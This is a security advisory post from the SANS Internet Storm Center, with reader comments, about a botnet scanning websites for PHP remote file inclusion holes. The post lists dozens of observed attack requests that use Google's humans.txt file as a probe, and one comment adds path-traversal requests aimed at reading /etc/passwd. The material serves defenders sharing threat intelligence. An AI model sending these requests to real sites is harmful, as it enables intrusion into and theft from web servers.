Threat Level: green Handler on Duty: Johannes Ullrich

SANS ISC: Massive PHP RFI scans - SANS Internet Storm Center SANS ISC InfoSec Forums


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Massive PHP RFI scans
Today one of our readers, Yinette, sent in a pcap of a pretty massive PHP RFI scans. Yinette has been seeing this for quite some time and the number of requests sent by this (yet unknown) bot or botnet kept rising.
Judging by the source IP address the bots appear to be running on compromised web servers with typical CPanel installations and large numbers of hosted virtual servers.
 
The scanning requests are relatively fast and in the capture Yinette made the bot constantly sent at least 2 requests per second. All requests try to exploit a RFI vulnerability (I haven’t checked yet to see if all of them are well known, but a cursory inspection says most of them are well known) and the file included is the humans.txt static file on Google (http://www.google.com/humans.txt).
 
The bot almost certainly parses the output and if it sees contents of the humans.txt file it knows that the site has a RFI (Remote File Inclusion) vulnerability. Google’s availability and uptime help of course.
 
Some observed requests are shown below:
 
GET /kernel/class/ixpts.class.php?IXP_ROOT_PATH=http://www.google.com/humans.txt? HTTP/1.0
GET /kernel/loadkernel.php?installPath=http://www.google.com/humans.txt? HTTP/1.0
GET /kmitaadmin/kmitam/htmlcode.php?file=http://www.google.com/humans.txt? HTTP/1.0
GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.google.com/humans.txt? HTTP/1.0
GET /lang/leslangues.php?fichier=http://www.google.com/humans.txt? HTTP/1.0
GET /lang_english/lang_main_album.php?phpbb_root_path=http://www.google.com/humans.txt?a= HTTP/1.0
GET /language/lang_english/lang_activity.php?phpbb_root_path=http://www.google.com/humans.txt? HTTP/1.0
GET /language/lang_english/lang_admin_album.php?phpbb_root_path=http://www.google.com/humans.txt?a= HTTP/1.0
GET /language/lang_german/lang_admin_album.php?phpbb_root_path=http://www.google.com/humans.txt?a= HTTP/1.0
GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://www.google.com/humans.txt?a= HTTP/1.0
GET /latestposts.php?forumspath=http://www.google.com/humans.txt? HTTP/1.0
GET /latex.php?bibtexrootrel=http://www.google.com/humans.txt? HTTP/1.0
GET /layout/default/params.php?gConf[dir][layouts]=http://www.google.com/humans.txt? HTTP/1.0
GET /ldap/authldap.php?includePath=http://www.google.com/humans.txt? HTTP/1.0
GET /learnPath/include/scormExport.inc.php?includePath=http://www.google.com/humans.txt? HTTP/1.0
GET /lib.editor.inc.php?sys_path=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/Loggix/Module/Calendar.php?pathToIndex=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/Loggix/Module/Comment.php?pathToIndex=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/Loggix/Module/Rss.php?pathToIndex=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/Loggix/Module/Trackback.php?pathToIndex=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/action/rss.php?lib=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/activeutil.php?set[include_path]=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/addressbook.php?GLOBALS[basedir]=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/armygame.php?libpath=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/authuser.php?root=http://www.google.com/humans.txt? HTTP/1.0
 
This is only a small part of all the requests the bot sends. In total, on Yinette’s web site it sent 804 requests (that’s 804 vulnerabilities it’s trying to exploit)! This indeed might be someone trying to build a big(er) botnet.

Are you seeing same/similar requests on your web site too? Or maybe you managed to catch the bot on a compromised machine or a honeypot? Let us know!

--
Bojan
@bojanz
INFIGO IS

Bojan

360 Posts
ISC Handler
I saw a burst of a few hundred attempts to grab the /etc/passwd file....
"GET /smarty_ajax/index.php?_=&f=update_intro&page=../../../../../etc/passwd%00 HTTP/1.0"
"GET /index.php?_=&f=update_intro&page=../../../../../etc/passwd%00 HTTP/1.0"
"GET /acp/index.php?p=../../../../../../../etc/passwd%00 HTTP/1.0"
"GET /index.php?p=../../../../../../../etc/passwd%00 HTTP/1.0"
"GET /frontend/js.php?module=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0"
"GET /js.php?module=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0"
"GET /index.php?xajax=SelTheme&xajaxargs[]=../../../../../../../../../../etc/passwd%00 HTTP/1.0"
"GET /index.php?option=com_rsappt_pro2&view=../../../../../../etc/passwd%0000 HTTP/1.0"
"GET /irsr/authenticate/sessions.php?globalIncludeFilePath=../../../../../../etc/passwd%0000 HTTP/1.0"
etc., etc.
John

1 Posts Posts
I saw a massive scan for PHP exploits on our webservers on 22. december (US IP), 28. december (AUS IP) and 4. january (GER and S IP), looks like every week at a regular basis. Most of them are pretty old.
Nik

4 Posts Posts
We have been seeing the humans.txt RFI requests since 17 Dec and continue, and have some 45000 in WAF logs from 57 different source IPs attacking various addresses in our class C address space - many not even hosting PHP sites. Valid host headers are used (ie they are not based just on target IP).
JLD

1 Posts Posts
Yes, we have had a *massive* uptick of PHP TCP/80 vulnerability scans against our perimeters that began last November. The scans have been trending down since November but are still generating a good number (majority) of events in our IPS even today. They source addresses are distributed so it's either due to a botnet or to a high number of infected systems.
da1212

69 Posts Posts
We're seeing a weekly attack against our external web site of about 450 or so various php exploits (e.g., ppalCart PHP File Include Vulnerability). They're all being blocked by our HP Tipping Point IPS/IDS. They started about mid December and have been weekly since then. We don't use php.
Anonymous

Posts
I cannot tell you what bot but what they are looking for (partly anyway) is a hole in vBulletin which is extremely vulnerable. Many sites have just pulled the plug until a fix is given. I just love PHP and sloppy code! We never had these problems with C and PERL as you really had to learn them to use them. PHP could be better if they spent time learning before writing crap. .Best, Al
Al of Your Data Center

80 Posts Posts
I cannot tell you what bot but what they are looking for (partly anyway) is a hole in vBulletin which is extremely vulnerable. Many sites have just pulled the plug until a fix is given. I just love PHP and sloppy code! We never had these problems with C and PERL as you really had to learn them to use them. PHP could be better if they spent time learning before writing crap. .Best, Al
Al of Your Data Center

80 Posts Posts
I cannot tell you what bot but what they are looking for (partly anyway) is a hole in vBulletin which is extremely vulnerable. Many sites have just pulled the plug until a fix is given. I just love PHP and sloppy code! We never had these problems with C and PERL as you really had to learn them to use them. PHP could be better if they spent time learning before writing crap. .Best, Al
Al of Your Data Center

80 Posts Posts

Sign Up for Free or Log In to start participating in the conversation!